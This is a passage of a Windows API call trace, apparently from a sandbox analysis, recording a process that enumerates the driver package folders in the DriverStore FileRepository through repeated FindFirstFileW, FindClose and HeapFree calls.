ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8421deb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8421deb9, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.473] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\en-US\\*", lpFindFileData=0x71d7b8 | out: lpFindFileData=0x71d7b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1dc3cf96, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x98858ddc, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x98858ddc, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da10 [0060.479] FindClose (in: hFindFile=0x71da10 | out: hFindFile=0x71da10) returned 1 [0060.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x71d7b8 | out: hHeap=0x6e0000) returned 1 [0060.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\*", lpFindFileData=0x71d7b8 | out: lpFindFileData=0x71d7b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x841f7c4a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x833f5788, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da10 [0060.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\1394.inf_amd64_neutral_0b11366838152a76\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x392f7a54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bdf6803, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bdf6803, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.485] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.486] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\61883.inf_amd64_neutral_a64d66bac757464c\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3da54f2d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607ef4b0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607ef4b0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.487] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.487] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpi.inf_amd64_neutral_aed2e7a487803437\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b4c763, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x46150ef0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x46150ef0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.489] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.490] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpipmi.inf_amd64_neutral_256ad642985694b3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x385b9fdb, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bb22dde, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bb22dde, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.491] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.491] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adp94xx.inf_amd64_neutral_4928c8870f6a1577\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42198250, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.491] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpahci.inf_amd64_neutral_b082e95ec9f8c3f9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422307d1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.492] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpu320.inf_amd64_neutral_4ea3d42a9839982a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eeeb2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.492] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.492] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\af9035bda.inf_amd64_neutral_aa11aa34552d1d4d\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x474c2389, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x660e6b94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x660e6b94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.493] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.493] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\agp.inf_amd64_neutral_22cdceb61fbafb43\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4290871e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61e1a1b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61e1a1b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.494] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.494] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsata.inf_amd64_neutral_67db50590108ebd9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x395cb479, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bedb045, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bedb045, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.498] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.498] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsbs.inf_amd64_neutral_5cae6933bef20aa8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41eea98b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ad4373, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ad4373, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.498] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.498] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel264.inf_amd64_neutral_04b54b6322607cce\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4662dcae, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d087cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d087cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.499] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel64.inf_amd64_neutral_6bed16c93db1ccf3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x466ec390, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d2e92d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d2e92d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.499] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.499] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angelu64.inf_amd64_neutral_3d6079dd78127f5e\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46784911, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d54a8d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d54a8d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.500] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arc.inf_amd64_neutral_11b52dec8e94d9aa\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x423f9854, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.500] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.500] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\arcsas.inf_amd64_neutral_c763887719bed95d\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x424b7f36, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61d0f817, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61d0f817, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.501] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.501] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiilhag.inf_amd64_neutral_0a660e899f5038a2\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d8b42c, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b8e793a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b8e793a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.503] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\atiriol6.inf_amd64_neutral_bde34ad5722cca75\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x459d4a78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659c2986, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659c2986, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.504] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avc.inf_amd64_neutral_3ef33c750e6308ce\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ebbd02d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b352f6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b352f6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.505] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbh826d_noaverir_x64.inf_amd64_neutral_da2ba9e8a30dad14\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45a6cff9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x659e8ae7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x659e8ae7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.507] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2hbtv_x64.inf_amd64_neutral_7216b6fb23536c40\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45b2b6da, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a34da7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a34da7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.510] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_noavin_x64.inf_amd64_neutral_86943dd17860e449\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45c0ff1c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65a5af08, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65a5af08, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.516] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.517] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averfx2swtv_x64.inf_amd64_neutral_24a71cdaabc7f783\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45d66b7e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65aa71c8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65aa71c8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.519] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.520] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\averhbh826_noaverir_x64.inf_amd64_neutral_2fe3b14136d6e46d\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45e25260, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65acd328, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65acd328, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.522] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.522] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\avmx64c.inf_amd64_neutral_8ebb15bf548db022\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x398df1b4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f66124f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f66124f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.525] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.525] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\battery.inf_amd64_neutral_cb8fa151a7b7cb80\\*", lpFindFileData=0x72ce68 | out: lpFindFileData=0x72ce68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43d90504, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6215ffff, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6215ffff, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.528] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72ce68 | out: hHeap=0x6e0000) returned 1 [0060.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\bda.inf_amd64_neutral_41c6262952846788\\*", lpFindFileData=0x72ce68 | out: lpFindFileData=0x72ce68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d9bc9ac, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607c934f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607c934f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.529] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.529] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72ce68 | out: hHeap=0x6e0000) returned 1 [0060.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\\*", lpFindFileData=0x72ce68 | out: lpFindFileData=0x72ce68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43bc7480, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62139e9e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62139e9e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.530] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.530] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72ce68 | out: hHeap=0x6e0000) returned 1 [0060.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\brmfcmdm.inf_amd64_neutral_af49d2f3ffa12116\\*", lpFindFileData=0x72ce68 | out: lpFindFileData=0x72ce68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50dd8b83, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c4482cb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c4482cb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.533] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 